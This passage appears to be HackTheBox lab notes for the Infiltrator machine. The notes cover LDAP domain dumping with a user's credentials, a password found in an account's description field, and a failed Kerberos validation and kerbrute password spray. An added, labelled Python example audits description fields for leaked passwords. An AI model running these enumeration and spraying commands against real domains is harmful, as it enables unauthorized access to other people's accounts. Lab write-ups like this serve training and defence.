LDAPDomainDump


┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/ldapdomaindump]
└─$ ldapdomaindump dc01.infiltrator.htb -u 'INFILTRATOR.HTB\l.clark' -p 'WAT?watismypass!' -n $IP --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

Dumping domain information using the credentials of the l.clark user.

Computers


Users


Another additional account found: lan_management. More importantly, there is what appears to be a password in the description field of the k.turner user: MessengerApp@Pass!
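From the defensive side, the same exposure can be caught by scanning every account's description value for password-like strings. The following is an added example, not part of the original notes: the heuristic, the function names and every sample row except the k.turner value shown above are assumptions constructed for illustration.

```python
import re

# A credential keyword followed by an explicit separator, e.g. "password: X" (heuristic).
KEYWORD = re.compile(r"(?i)\b(?:pass(?:word|wd)?|pwd)\b\s*(?:[:=]|\bis\b)\s*(\S+)")

def char_classes(token):
    """Count how many of lower/upper/digit/symbol appear in the token."""
    checks = (str.islower, str.isupper, str.isdigit, lambda c: not c.isalnum())
    return sum(any(check(c) for c in token) for check in checks)

def looks_like_secret(token, min_len=8, min_classes=3):
    """Long, whitespace-free tokens mixing 3+ character classes are suspicious."""
    token = token.strip(".,;:()")  # ignore ordinary sentence punctuation
    return len(token) >= min_len and char_classes(token) >= min_classes

def audit_descriptions(accounts):
    """Return [(account, reason, token)] for descriptions that may hold a password."""
    findings = []
    for name, description in accounts:
        if not description:
            continue
        match = KEYWORD.search(description)
        if match:
            findings.append((name, "keyword", match.group(1)))
            continue
        for token in description.split():
            if looks_like_secret(token):
                findings.append((name, "complexity", token))
                break
    return findings

# Constructed sample rows (sAMAccountName, description). Only the k.turner
# value comes from the dump above; the other accounts are hypothetical.
SAMPLE = [
    ("j.example", "Helpdesk, building B-2, ext. 4410"),
    ("k.turner", "MessengerApp@Pass!"),
    ("svc_example", "Temp password: Winter2024!"),
    ("empty.example", None),
]

if __name__ == "__main__":
    for account, reason, token in audit_descriptions(SAMPLE):
        print(f"[!] {account}: possible credential in description ({reason}): {token}")
```

Findings from a scan like this are leads for cleanup and password rotation; the heuristic will miss weak passwords and occasionally flag ordinary text.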

Validation (failed)


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT INFILTRATOR.HTB/k.turner@dc01.infiltrator.htb -dc-ip $IP                          
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: MessengerApp@Pass!
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)

Validation Failed

Password Spray


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ kerbrute passwordspray --dc dc01.infiltrator.htb -d INFILTRATOR.HTB users.txt 'MessengerApp@Pass!'
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 09/01/24 - Ronnie Flathers @ropnop
 
2024/09/01 00:54:18 >  Using KDC(s):
2024/09/01 00:54:18 >  	dc01.infiltrator.htb:88
 
2024/09/01 00:54:18 >  Done! Tested 12 logins (0 successes) in 0.101 seconds

Password spray failed. MessengerApp@Pass! does not belong to any of the domain users.

Groups